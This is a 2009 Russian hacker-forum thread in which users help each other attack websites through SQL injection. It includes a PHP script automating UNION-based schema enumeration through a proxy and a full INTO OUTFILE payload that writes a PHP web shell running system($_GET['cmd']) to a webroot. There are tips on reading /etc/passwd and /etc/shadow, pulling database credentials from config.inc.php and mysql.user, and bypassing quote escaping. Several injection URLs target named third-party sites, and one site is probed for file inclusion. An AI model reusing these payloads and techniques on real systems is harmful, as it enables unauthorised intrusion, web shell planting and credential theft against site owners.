RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj)
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-08 07:19:31.170000
|
|
|
Cep}|{
Сообщений: 1396
Оценки: 0
Присоединился: 2007-06-26 01:11:51.416666
|
quote:
ORIGINAL: TANCHIK
"Как уже упоминалось выше, в скрипте предусмотрены необязательные параметры, общие для каждого из способов перебора.
-o =[file] - вывод результатов в лог-файл (например, -o="/home/root/result.txt");
-p=[port] - порт (по умолчанию 80);
-P=[ip:port] - использование прокси (например, -P=127.0.0.1:8080)"???
Там ничего такого нет, даже и не мечтай.
Он тупо заменяет тебя, меняющего циферки в лимите))
Ну и прокси юзает.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-08 07:27:50.703333
|
|
|
TANCHIK
Сообщений: 45
Оценки: 0
Присоединился: 2009-07-19 22:04:07.633333
|
Ну, я уже и так заинтригован, напиши хоть часть скрипта, прям здесь чтоли?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-08 07:33:50.106666
|
|
|
Cep}|{
Сообщений: 1396
Оценки: 0
Присоединился: 2007-06-26 01:11:51.416666
|
Так увидел ? Он вообще-то над твоим постом стоял.
<?
function getpage($u) {
$curl = curl_init($u);
curl_setopt($curl, CURLOPT_PROXY, 'x.x.x.x:xxxx');
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6');
$ret=curl_exec($curl);
curl_close($curl);
return $ret;
}
$i=1;
$page=getpage("парам-пам-пам/тарарурам.cfm?id=1&CAT_ID=1+union+select+1,concat_ws(0x3a,table_schema,table_name),3,4,5+from+information_schema.tables+limit+{$i},1");
?>
ЗЫЫЫ. Подучи хотя бы for
Так и набери в гугле - РНР for
[very very бухъ]
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-08 07:43:30.500000
|
|
|
Cep}|{
Сообщений: 1396
Оценки: 0
Присоединился: 2007-06-26 01:11:51.416666
|
[млин]
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-08 08:13:25.396666
|
|
|
TANCHIK
Сообщений: 45
Оценки: 0
Присоединился: 2009-07-19 22:04:07.633333
|
Мля, а как потом запускать скрипты то эти? сори!
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-08 08:23:22.673333
|
|
|
Cep}|{
Сообщений: 1396
Оценки: 0
Присоединился: 2007-06-26 01:11:51.416666
|
Эт ооффтоп уже идет!
Иди - http://forum.xakep.ru/m_1215681/tm.htm
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-08 11:20:27.336666
|
|
|
daniel_1024
Сообщений: 294
Оценки: 0
Присоединился: 2009-07-14 14:37:28.690000
|
народ никто не подскажет где скачать брутфорсер для перебора еоличества столбцов в базе данных…а то лень руками перебирать… я про вот это:
=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11…и до бесконечности пока не исчезнет сообщение об ошибке
или кому не влом ссылку дайте куда надо:)
З. Ы. еще один вопрос - каким образом можно узнать есть ли на сайте админка ?!
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-08 11:38:48.466666
|
|
|
Eridan
Сообщений: 5
Оценки: 0
Присоединился: 2009-08-05 23:02:24.290000
|
Ребята,помогите пожалуйста с инъекцией,не могу ошибку обойти,не получается запрос составить,даже самый простой: http://pw.md/sait/processor.php?login=1+or+1=@@version–+
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-08 11:48:26.143333
|
|
|
Cep}|{
Сообщений: 1396
Оценки: 0
Присоединился: 2007-06-26 01:11:51.416666
|
А оно тебе надо ?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-08 15:40:22.086666
|
|
|
d1v
Сообщений: 94
Оценки: 0
Присоединился: 2009-01-15 13:02:42.456666
|
daniel_1024, а order by пробовал юзать?
quote:
З. Ы. еще один вопрос - каким образом можно узнать есть ли на сайте админка ?!
если паблик движок, то просто скачай его посмотри где там админка, а если нет то ручками :)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-08 16:29:20.203333
|
|
|
daniel_1024
Сообщений: 294
Оценки: 0
Присоединился: 2009-07-14 14:37:28.690000
|
а может админки вообще не быть ?? :)
кстати можно каким- либо образом получить высокие права или дефейс сделать только с помощью скуль - инъекции ?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-08 16:39:49.773333
|
|
|
d1v
Сообщений: 94
Оценки: 0
Присоединился: 2009-01-15 13:02:42.456666
|
можно сделать шелл спомошью into outfile, если есть права на запись и полный путь до каталога или прочитать etc/passwd, если есть права на чтение.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-08 16:46:45.493333
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
если magic_quotes=OFF - можно, если =ON, то только через двойной запрос, или искать инклуд в одном из полей при sql-inj, если ошибки выводятся
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-08 16:47:11.256666
|
|
|
daniel_1024
Сообщений: 294
Оценки: 0
Присоединился: 2009-07-14 14:37:28.690000
|
в большинстве случаев их нету…[:(][:(] в этом и вся поблема. А получить их или повысить с помощью скули нельзя ?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-08 16:54:16.713333
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
дефейс - это зло. Так только турецкие хоцкеры неразумные делают. Потому что ничего прикольного в дефейсе нет. Наоборот, вы как бы сразу говорите - "смотрите, какой я дурачок, шелл залить не смог, зато смог вставить сиськи на главную страницу сайта, правда при этом админ, даже если он полный кретин, сразу понимает, что его поимели и делает бекап, если не совсем кретин -штопает все дыры, правда это круто?"
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-08 17:01:35.290000
|
|
|
daniel_1024
Сообщений: 294
Оценки: 0
Присоединился: 2009-07-14 14:37:28.690000
|
:DPashkela - рассмешил:D
ладно…..тогда хотя бы получить пассы от ftp…
файл /etc/password/ я просмотрел….там пароли спрятаны за "x", а файл /etc/shadow загрузить не удается….
можно ли что то сделать в этой ситуации что поиметь фтп - шник ?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-08 17:18:13.383333
|
|
|
coolziro
Сообщений: 158
Оценки: 0
Присоединился: 2009-02-28 17:51:42.486666
|
SQL конфиг по ищи может получиться к самой скуль базе при коннектиться, тогда заюзаешь PhpMyAdmin и зальешь шелл.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-08 17:24:31.076666
|
|
|
daniel_1024
Сообщений: 294
Оценки: 0
Присоединился: 2009-07-14 14:37:28.690000
|
coolziro просвети плиз где хотя бы примерно может быть SQL - config ? че это за фича такая ?:D
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-08 17:51:14.446666
|
|
|
d1v
Сообщений: 94
Оценки: 0
Присоединился: 2009-01-15 13:02:42.456666
|
config.inc.php файл в котором храняться логин и пасс от бд, лежать он должен в phpmyadmin/config.inc.php или pma/config.inc.php или ещё где-нибудь, смотря как называеться папка.
quote:
файл /etc/password/ я просмотрел
а теперь посмотри config.inc.php, и приконнектся в базе.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-08 18:01:28.253333
|
|
|
daniel_1024
Сообщений: 294
Оценки: 0
Присоединился: 2009-07-14 14:37:28.690000
|
ничего не происходит - ни ошибки не вылетает, ни phpmyadmin/config.inc.php не отображается. наверно прав нету [:(]
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-08 21:56:26.726666
|
|
|
daniel_1024
Сообщений: 294
Оценки: 0
Присоединился: 2009-07-14 14:37:28.690000
|
кстати еще один вопрос - не подскажите ли способ как обойти экранирование ковычек в скуль - запросах ?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-08 22:02:22.403333
|
|
|
coolziro
Сообщений: 158
Оценки: 0
Присоединился: 2009-02-28 17:51:42.486666
|
Ахаха, да тут полный путь нужен! а не просто так phpmyadmin/config.inc.php.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-08 22:11:57.626666
|
|
|
S00pY
Сообщений: 785
Оценки: 0
Присоединился: 2007-04-14 20:44:05.376666
|
Если это magic_quotes то врятле "обойдёшь"… они слешат токо get,post… $_SERVER[] не буит слешиться…
Если тебе просто надо указать значение например для where то можно похексить или char() юзать…
quote:
SQL конфиг по ищи может получиться к самой скуль базе при коннектиться, тогда заюзаешь PhpMyAdmin и зальешь шелл.
Поискать можно если только file_priv=Y … а в таком случае если магик квоты офф то уже и до шелла недалеко…
quote:
config.inc.php файл в котором храняться логин и пасс от бд, лежать он должен в phpmyadmin/config.inc.php или pma/config.inc.php или ещё где-нибудь, смотря как называеться папка.
Это если phpmyadmin проинстален….
Конфиг к бд моно найти глянув скрипт который работает с бд… например тот в котором ты инжектишь,там и будет конфиг или подключение конфига файла…
Учётку от бд можно достать из таблы mysql.user опять таки если есть права от туда читать…
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-08 22:55:58.740000
|
|
|
daniel_1024
Сообщений: 294
Оценки: 0
Присоединился: 2009-07-14 14:37:28.690000
|
у меня еще один вопрос….вот я надыбал список всех баз сайта. может ли быть так что к одной базе данных доступ разрешен (я могу просмотреть список её таблиц), а к другой - нет (ничего не отображается) ?
у меня сейчас такая ситуация……наверно я ошибся
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-08 23:12:33.876666
|
|
|
S00pY
Сообщений: 785
Оценки: 0
Присоединился: 2007-04-14 20:44:05.376666
|
может быть…. всё зависит отпользователя…
Если доступ запрещён то мускуль ругнёться типо такому юзверю запрещён доступ к этой бд…
Зы:Возможно ты хочешь сделать выборку из другой бд,а текущая бд совсем другая и может быть эррор что таблицы не сушествует в этой бд…
Надо конкретно указать из какой базы селектить… типа
select * from db_name.table_name;
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-09 15:54:13.296666
|
|
|
axot111
Сообщений: 13
Оценки: 0
Присоединился: 2009-07-11 22:51:38.426666
|
Вот такой вопрос, допустим имеется сайт www.site.ru/news.php?id=-1+union+select+1,2,3,4,5,6–
Известна таблица users с клюмами pwd и login
Как правильно составить запрос чтоб залить шелл <? system($_GET['cmd']); ?> тоесть не через админку… путь до каталога такой /usr2/www/www.site.ru/ покажите пожалуйсто…
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-09 19:15:34.683333
|
|
|
d1v
Сообщений: 94
Оценки: 0
Присоединился: 2009-01-15 13:02:42.456666
|
www.site.ru/news.php?id=-1+union+select+1,'<? system($_GET['cmd']); ?>',3,4,5,6+from+users+into+outfile+'/usr2/www/www.site.ru/shell.php'– это если принтабельное поле 2 (я хз какое у тебя) и есть права на запись.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-09 19:39:52.430000
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
d1v при записи в файл решительно до фонаря, какое поле принтабельное. Записываются все поля.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-09 19:46:18.193333
|
|
|
daniel_1024
Сообщений: 294
Оценки: 0
Присоединился: 2009-07-14 14:37:28.690000
|
скажите пожалуйста кто знает как можно обойти экранирование ковычек? т.е. когда сервер превращает ' в \' ? или в этом случае скуль-инъекция невозможна ?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-09 19:48:45.436666
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
daniel_1024 просмотри мои уроки по скулям. Во втором уроке я даже скрипт для этого набросал.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-09 20:12:48.040000
|
|
|
daniel_1024
Сообщений: 294
Оценки: 0
Присоединился: 2009-07-14 14:37:28.690000
|
horiz твои уроки я проштудировал, про перевод слова в шестнадцатеричный вид я знаю…
ладно..тогда приведу конкретный пример - http://xocmep.ru/index.php?info=faq&rz=index. Можно ли что-то выжить оттуда ? насколько я понимаю скуля там есть….(при http://xocmep.ru/index.php?info=faq&rz=index' выходит ошибка), но сформировать запрос к базе данных не получается[:(]
скажите можно ли будет в этом случае получить доступ к базе данных?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-09 20:20:45.400000
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
daniel_1024 при чем тут инекция. Почитай ошибку:
quote:
Failed opening 'faq/index\'.php' for inclusion
Там PHP-инклудинг проклевывается.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-09 20:50:42.776666
|
|
|
daniel_1024
Сообщений: 294
Оценки: 0
Присоединился: 2009-07-14 14:37:28.690000
|
PHP-инклудинг…оо….теперь и про это надо будет почитать…сколько всего нового:D:D
а он по возможностям типа скулы ? можно получить доступ к серваку или базе данных ?
horiz спс за то что сайт посмотрел…
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-09 20:55:25.796666
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
quote:
а он по возможностям типа скулы ? можно получить доступ к серваку или базе данных ?
При удачном раскладе можно сразу шелл заиметь.
Твой сайт особо не проверял, оценил только текст ошибки.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-09 21:15:17.040000
|
|
|
daniel_1024
Сообщений: 294
Оценки: 0
Присоединился: 2009-07-14 14:37:28.690000
|
horiz можешь пожалуйста ссылку дать на что-нибудь про это…я в гугле был (15 минут), поиск по форуму юзал.:)я не понял как его произвести собственно…
или он производится под какую то определенную версию форума/движка сайта ? "php - инклюдинг в phpmyadmin" и т.д
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-09 21:30:54
|
|
|
d1v
Сообщений: 94
Оценки: 0
Присоединился: 2009-01-15 13:02:42.456666
|
http://xocmep.ru/index.php?info=faq&rz=index инклуд там локальный, и то файлы инклудятся без расширения. faq - папка, index- файл index.php
забей на этот сайт, ничего интерестного оттуда не выдернешь..
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-09 21:35:00.436666
|
|
|
S00pY
Сообщений: 785
Оценки: 0
Присоединился: 2007-04-14 20:44:05.376666
|
quote:
ORIGINAL: d1v
http://xocmep.ru/index.php?info=faq&rz=index инклуд там локальный, и то файлы инклудятся без расширения. faq - папка, index- файл index.php
забей на этот сайт, ничего интерестного оттуда не выдернешь..
Диру можно изменить… Но rfi походу не добиться….
Можно былоб попытаться отрезать расширение слешами..
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-09 21:46:14.670000
|
|
|
d1v
Сообщений: 94
Оценки: 0
Присоединился: 2009-01-15 13:02:42.456666
|
quote:
Диру можно изменить… Но rfi походу не добиться….
Можно былоб попытаться отрезать расширение слешами..
там ещё хитрее: инклудиться даже не из папки а из index.php той папки которая указана
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-09 22:00:59.316666
|
|
|
daniel_1024
Сообщений: 294
Оценки: 0
Присоединился: 2009-07-14 14:37:28.690000
|
народ, только как это всё осуществить ?! можете дать че-нить про пхп - инклюдинг почитать ? я в гугле был…
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-08-09 22:04:19.406666
|
|
|
d1v
Сообщений: 94
Оценки: 0
Присоединился: 2009-01-15 13:02:42.456666
|
http://www.bit-team.com/index.php?autocom=ibwiki&cmd=article&id=18
только на xocmep.ru ты ничего не сделашь..
|
|
|
|
|
|
